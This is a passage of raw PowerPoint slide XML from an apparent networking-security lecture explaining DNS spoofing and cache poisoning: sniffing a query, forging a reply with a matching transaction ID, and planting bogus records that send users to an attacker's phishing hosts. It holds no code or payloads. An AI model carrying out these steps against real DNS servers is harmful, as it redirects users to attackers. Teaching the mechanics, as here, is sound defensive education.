              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS server; sniffed by attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="649288" indent="-649288" algn="l">
              <a:buFontTx/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker responds with bogus </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS reply</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37894" name="Text Box 31"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8664575" y="6246813"/>
            <a:ext cx="261938" cy="500062"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37895" name="Text Box 32"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8559800" y="5640388"/>
            <a:ext cx="4368800" cy="3824287"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" u="sng">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Issues:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> Must spoof IP address: set </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>to local DNS server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" i="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(easy)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Must match reply ID with  request ID </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" i="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(easy if on the same LAN)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>May need to stop reply</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>from the local DNS server </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400" i="1">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(harder)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="en-US" sz="2400">
              <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial"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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{0FE59E2D-21CC-4285-B2ED-BCC111F41F95}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38915" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="635000" y="914400"/>
            <a:ext cx="11703050" cy="16256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Poisoning DNS Cache (1)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38916" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:noFill/>
          <a:ln>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="130046" tIns="65023" rIns="130046" bIns="65023" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Poisoning: Attempt to put bogus records into DNS name server caches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Bogus records could point to attacker nodes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Attacker nodes could phish</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>But unsolicited replies are not accepted at a name server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="2D2D8A"/>
              </a:buClr>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Name servers use Transaction IDs in DNS messages to match replies to queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFont typeface="Arial" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>So can’t just insert a record into a name server by sending a DNS reply message.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="l">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:buFontTx/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="3200">
                <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>But can send a reply to a request.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4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="12353925" y="9428163"/>
            <a:ext cx="650875" cy="650875"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="130046" tIns="65023" rIns="130046" bIns="65023"/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{2D1E6256-BB24-4C41-BBBE-AEF506911105}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39939" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="711200" y="838200"/>
            <a:ext cx="11053763" cy="9144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Poisoning local DNS server (2)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="39940" name="Group 39"/>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="1701800" y="1981200"/>
            <a:ext cx="8866188" cy="6154738"/>
            <a:chOff x="582" y="636"/>
            <a:chExt cx="3927" cy="2726"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39942" name="Freeform 3"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1331" y="918"/>
              <a:ext cx="1289" cy="1291"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 218 w 1292"/>
                <a:gd name="T1" fmla="*/ 7 h 1255"/>
                <a:gd name="T2" fmla="*/ 35 w 1292"/>
                <a:gd name="T3" fmla="*/ 287 h 1255"/>
                <a:gd name="T4" fmla="*/ 29 w 1292"/>
                <a:gd name="T5" fmla="*/ 946 h 1255"/>
                <a:gd name="T6" fmla="*/ 53 w 1292"/>
                <a:gd name="T7" fmla="*/ 1499 h 1255"/>
                <a:gd name="T8" fmla="*/ 224 w 1292"/>
                <a:gd name="T9" fmla="*/ 1576 h 1255"/>
                <a:gd name="T10" fmla="*/ 625 w 1292"/>
                <a:gd name="T11" fmla="*/ 2041 h 1255"/>
                <a:gd name="T12" fmla="*/ 953 w 1292"/>
                <a:gd name="T13" fmla="*/ 2239 h 1255"/>
                <a:gd name="T14" fmla="*/ 1136 w 1292"/>
                <a:gd name="T15" fmla="*/ 1851 h 1255"/>
                <a:gd name="T16" fmla="*/ 1208 w 1292"/>
                <a:gd name="T17" fmla="*/ 806 h 1255"/>
                <a:gd name="T18" fmla="*/ 1142 w 1292"/>
                <a:gd name="T19" fmla="*/ 381 h 1255"/>
                <a:gd name="T20" fmla="*/ 707 w 1292"/>
                <a:gd name="T21" fmla="*/ 207 h 1255"/>
                <a:gd name="T22" fmla="*/ 218 w 1292"/>
                <a:gd name="T23" fmla="*/ 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graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="39943" name="Object 4"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="582" y="1266"/>
            <a:ext cx="385" cy="328"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s39987" name="Clip" r:id="rId3" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId3" imgW="1307079" imgH="1083682"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 y="1266"/>
                          <a:ext cx="385" cy="328"/>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grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="39944" name="Group 5"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3089" y="1641"/>
              <a:ext cx="150" cy="305"/>
              <a:chOff x="4180" y="783"/>
              <a:chExt cx="150" cy="307"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39969" name="AutoShape 6"/>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9970" name="Rectangle 7"/>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9971" name="Rectangle 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9972" name="AutoShape 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9973" name="Line 10"/>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en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39974" name="Line 11"/>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en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39975" name="Rectangle 1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9976" name="Rectangle 13"/>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grpSp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="39945" name="Group 14"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="3090" y="754"/>
              <a:ext cx="150" cy="305"/>
              <a:chOff x="4180" y="783"/>
              <a:chExt cx="150" cy="307"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39961" name="AutoShape 15"/>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9962" name="Rectangle 16"/>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9963" name="Rectangle 1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9964" name="AutoShape 1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9965" name="Line 19"/>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en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39966" name="Line 20"/>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en-US"/>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="39967" name="Rectangle 2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9968" name="Rectangle 22"/>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grpSp>
        <p:graphicFrame>
          <p:nvGraphicFramePr>
            <p:cNvPr id="39946" name="Object 23"/>
            <p:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </p:cNvGraphicFramePr>
            <p:nvPr/>
          </p:nvGraphicFramePr>
          <p:xfrm>
            <a:off x="1628" y="2474"/>
            <a:ext cx="385" cy="328"/>
          </p:xfrm>
          <a:graphic>
            <a:graphicData uri="http://schemas.openxmlformats.org/presentationml/2006/ole">
              <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
                <mc:Choice xmlns:v="urn:schemas-microsoft-com:vml" Requires="v">
                  <p:oleObj spid="_x0000_s39988" name="Clip" r:id="rId5" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                  </p:oleObj>
                </mc:Choice>
                <mc:Fallback>
                  <p:oleObj name="Clip" r:id="rId5" imgW="1307079" imgH="1083682" progId="">
                    <p:embed/>
                    <p:pic>
                      <p:nvPicPr>
                        <p:cNvPr id="0"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 y="2474"/>
                          <a:ext cx="385" cy="328"/>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sp>
          <p:nvSpPr>
            <p:cNvPr id="39947" name="Text Box 24"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3051" y="1959"/>
              <a:ext cx="1370" cy="368"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Local DNS</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Server (eg, Berkeley)</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39948" name="Text Box 25"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1445" y="2830"/>
              <a:ext cx="731" cy="532"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Attacker in</a:t>
              </a:r>
              <a:br>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
              </a:br>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>Australia:</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr algn="l"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="2400">
                  <a:latin typeface="Arial" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>17.32.8.9</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39949" name="Freeform 26"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1829" y="1767"/>
              <a:ext cx="1222" cy="701"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1222"/>
                <a:gd name="T1" fmla="*/ 701 h 701"/>
                <a:gd name="T2" fmla="*/ 296 w 1222"/>
                <a:gd name="T3" fmla="*/ 257 h 701"/>
                <a:gd name="T4" fmla="*/ 1222 w 1222"/>
                <a:gd name="T5" fmla="*/ 0 h 701"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1222"/>
                <a:gd name="T10" fmla="*/ 0 h 701"/>
                <a:gd name="T11" fmla="*/ 1222 w 1222"/>
                <a:gd name="T12" fmla="*/ 701 h 701"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="1222" h="701">
                  <a:moveTo>
                    <a:pt x="0" y="701"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="537"/>
                    <a:pt x="93" y="374"/>
                    <a:pt x="296" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="499" y="140"/>
                    <a:pt x="1068" y="43"/>
                    <a:pt x="1222" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="31750">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39950" name="Freeform 27"/>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1987" y="1902"/>
              <a:ext cx="1082" cy="662"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1222"/>
                <a:gd name="T1" fmla="*/ 210 h 701"/>
                <a:gd name="T2" fmla="*/ 24 w 1222"/>
                <a:gd name="T3" fmla="*/ 76 h 701"/>
                <a:gd name="T4" fmla="*/ 94 w 1222"/>
                <a:gd name="T5" fmla="*/ 0 h 701"/>
                <a:gd name="T6" fmla="*/ 0 60000 65536"/>
                <a:gd name="T7" fmla="*/ 0 60000 65536"/>
                <a:gd name="T8" fmla="*/ 0 60000 65536"/>
                <a:gd name="T9" fmla="*/ 0 w 1222"/>
                <a:gd name="T10" fmla="*/ 0 h 701"/>
                <a:gd name="T11" fmla="*/ 1222 w 1222"/>
                <a:gd name="T12" fmla="*/ 701 h 701"/>
              </a:gdLst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="T6">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="T7">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="T8">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
              </a:cxnLst>
              <a:rect l="T9" t="T10" r="T11" b="T12"/>
              <a:pathLst>
                <a:path w="1222" h="701">
                  <a:moveTo>
                    <a:pt x="0" y="701"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="46" y="537"/>
                    <a:pt x="93" y="374"/>
                    <a:pt x="296" y="257"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="499" y="140"/>
                    <a:pt x="1068" y="43"/>
                    <a:pt x="1222" y="0"/>
                  </a:cubicBezTo>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:noFill/>
            <a:ln w="31750">
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd type="triangle" w="med" len="med"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39951" name="Text Box 28"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1023" y="2069"/>
              <a:ext cx="963" cy="368"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
